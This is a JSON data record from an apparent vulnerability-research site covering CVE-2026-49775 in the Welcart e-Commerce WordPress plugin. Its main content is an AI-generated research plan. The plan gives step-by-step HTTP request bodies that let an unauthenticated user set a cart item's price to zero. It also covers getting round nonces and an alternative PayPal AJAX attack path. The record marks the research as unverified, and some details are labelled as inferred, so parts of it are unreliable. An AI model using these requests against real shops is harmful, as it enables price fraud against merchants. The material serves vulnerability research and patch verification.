[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5NvPvLfnNy6O39xmvDPn0KVJ1jrXwhMIKObJMBqnk30":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-49775","welcart-e-commerce-missing-authorization-4","Welcart e-Commerce \u003C= 2.11.28 - Missing Authorization","The Welcart e-Commerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.11.28. This makes it possible for unauthenticated attackers to perform an unauthorized action.","usc-e-shop",null,"\u003C=2.11.28","2.11.29","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-04 00:00:00","2026-06-08 14:45:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5a1391b1-b0c3-4cf4-8850-d9367d90ec9e?source=api-prod",5,[22,23,24,25,26,27],"classes\u002Fcart.class.php","classes\u002FpaymentPayPalCP.class.php","classes\u002Fusceshop.class.php","functions\u002Ffunction.php","readme.txt","usc-e-shop.php","researched",false,3,"This research plan targets a missing authorization vulnerability in **Welcart e-Commerce \u003C= 2.11.28**. Based on the source code in `classes\u002Fcart.class.php`, the vulnerability likely resides in the `upCart()` function, which allows administrative parameters to override item prices in the shopping cart without a capability check.\n\n### 1. Vulnerability Summary\nThe `usces_cart::upCart` method in `classes\u002Fcart.class.php` handles updates to the shopping cart (e.g., quantity changes). It contains logic intended for administrators to manually set prices during order editing. However, this logic is reachable by unauthenticated users through the standard cart update process. By providing the `order_action` parameter, an attacker can bypass the standard price calculation (`get_realprice`) and supply an arbitrary price via the `skuPrice` parameter.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: Any frontend page (triggers `init` hook) or `admin-ajax.php` if mapped to an action. The primary vector is a `POST` request to the site root or cart page.\n*   **Vulnerable Action**: Cart Update (`upCart`).\n*   **Authentication**: None required (Unauthenticated).\n*   **Preconditions**:\n    *   The plugin must be active.\n    *   At least one product (with a valid SKU) must be added to the current session's cart.\n*   **Vulnerable Parameters**:\n    *   `upCart`: Triggers the update logic.\n    *   `order_action`: Bypasses server-side price calculation.\n    *   `skuPrice`: Supplies the unauthorized price value.\n    *   `quant`: Used to identify the target item in the cart.\n\n### 3. Code Flow\n1.  **Entry Point**: A `POST` request is sent containing the `upCart` parameter.\n2.  **Hook**: `usc_e_shop::init` (in `classes\u002Fusceshop.class.php`) detects `$_POST['upCart']` and calls `$this->cart->upCart()`.\n3.  **Processing**: `usces_cart::upCart()` (in `classes\u002Fcart.class.php`) iterates through `$_POST['quant']`.\n4.  **Vulnerable Branch**:\n    ```php\n    \u002F\u002F Line 139 in classes\u002Fcart.class.php\n    if ( isset( $_POST['order_action'] ) ) {\n        $price = (int) $_POST['skuPrice'][ $index ][ $post_id ][ $sku ];\n    } else {\n        $price = $this->get_realprice( $post_id, $sku, $_SESSION['usces_cart'][ $this->serial ]['quant'] );\n        \u002F\u002F ...\n    }\n    $_SESSION['usces_cart'][ $this->serial ]['price'] = $price;\n    ```\n5.  **Sink**: The manipulated `$price` is saved directly into the `$_SESSION['usces_cart']` array, which is used for the final checkout total.\n\n### 4. Nonce Acquisition Strategy\nThe `upCart` and `inCart` operations in Welcart typically **do not require nonces** for frontend users as they are part of the standard, unauthenticated shopping experience. \n\nIf a nonce is enforced in a specific environment, it is usually localized in the `uscesL10n` object.\n*   **Strategy**:\n    1.  Navigate to a product page.\n    2.  Check for a nonce in the page source.\n    3.  **JS Variable**: `window.uscesL10n?.item_nonce` (inferred from Welcart standards).\n    4.  **Creation\u002FVerification Consistency**: If `wp_verify_nonce($nonce, -1)` is used, any valid nonce will work.\n\n### 5. Exploitation Strategy\nThe goal is to set the price of an item in the cart to `0`.\n\n**Step 1: Add an item to the cart**\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `{{BASE_URL}}\u002F?usces_cart=1`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    inCart[{{POST_ID}}][{{SKU}}]=inCart&quant[{{POST_ID}}][{{SKU}}]=1\n    ```\n\n**Step 2: Manipulate the price via `upCart`**\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `{{BASE_URL}}\u002F?usces_cart=1`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    upCart=1&order_action=1&quant[0][{{POST_ID}}][{{SKU}}]=1&skuPrice[0][{{POST_ID}}][{{SKU}}]=0\n    ```\n    *Note: `index` is `0` for the first item in the cart.*\n\n**Step 3: Verify the cart**\n*   **Tool**: `http_request`\n*   **Method**: `GET`\n*   **URL**: `{{BASE_URL}}\u002Fusces-cart\u002F` (or the page containing the `[usces_cart]` shortcode).\n\n### 6. Test Data Setup\n1.  **Create a Product**:\n    ```bash\n    wp post create --post_type=post --post_title=\"Expensive Item\" --post_status=publish\n    # Capture the POST_ID\n    ```\n2.  **Add Welcart Metadata**:\n    Welcart requires specific metadata to recognize a post as an item.\n    ```bash\n    wp post meta add {{POST_ID}} _itemCode \"TEST-SKU\"\n    wp post meta add {{POST_ID}} _itemName \"Expensive Item\"\n    wp post meta add {{POST_ID}} _itemPrice 9999\n    wp post meta add {{POST_ID}} _itemZaiko 1000\n    # Add SKU\n    wp db query \"INSERT INTO wp_usces_skus (post_id, code, price, stock) VALUES ({{POST_ID}}, 'SKU001', 9999, 100);\"\n    ```\n3.  **Ensure Cart Page Exists**:\n    ```bash\n    wp post create --post_type=page --post_title=\"Cart\" --post_content=\"[usces_cart]\" --post_status=publish\n    ```\n\n### 7. Expected Results\n*   The `upCart` request should return a `302` redirect (standard Welcart behavior after cart update).\n*   The subsequent `GET` request to the cart page should show the \"Expensive Item\" with a Unit Price and Subtotal of `0` instead of `9999`.\n\n### 8. Verification Steps\n1.  **Check Session (via Browser)**: Use `browser_navigate` to the cart page and `browser_eval` to check for the text \"0\" in the price columns.\n2.  **Database Check**: Since the cart is session-based, it isn't in the DB until the order is placed. To fully verify, complete a \"Mock\" checkout and then check the `wp_usces_order` table:\n    ```bash\n    wp db query \"SELECT order_item_total_price FROM wp_usces_order ORDER BY ID DESC LIMIT 1;\"\n    ```\n    The result should be `0.00`.\n\n### 9. Alternative Approaches\nIf `order_action` is blocked by a global WAF or check:\n*   Explore `classes\u002FpaymentPayPalCP.class.php`. The `create_order` AJAX action (`wp_ajax_nopriv_create_order`) might allow injecting order data if it lacks validation.\n*   **Payload for PayPal action**:\n    `POST \u002Fwp-admin\u002Fadmin-ajax.php`\n    `action=create_order&...` (requires tracing the `create_order` function body, which was truncated in the source but is registered for `nopriv`).","gemini-3-flash-preview","2026-06-26 05:10:57","2026-06-26 05:11:46",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","2.11.28","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fusc-e-shop\u002Ftags\u002F2.11.28","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fusc-e-shop.2.11.28.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fusc-e-shop\u002Ftags\u002F2.11.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fusc-e-shop.2.11.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fusc-e-shop\u002Ftags"]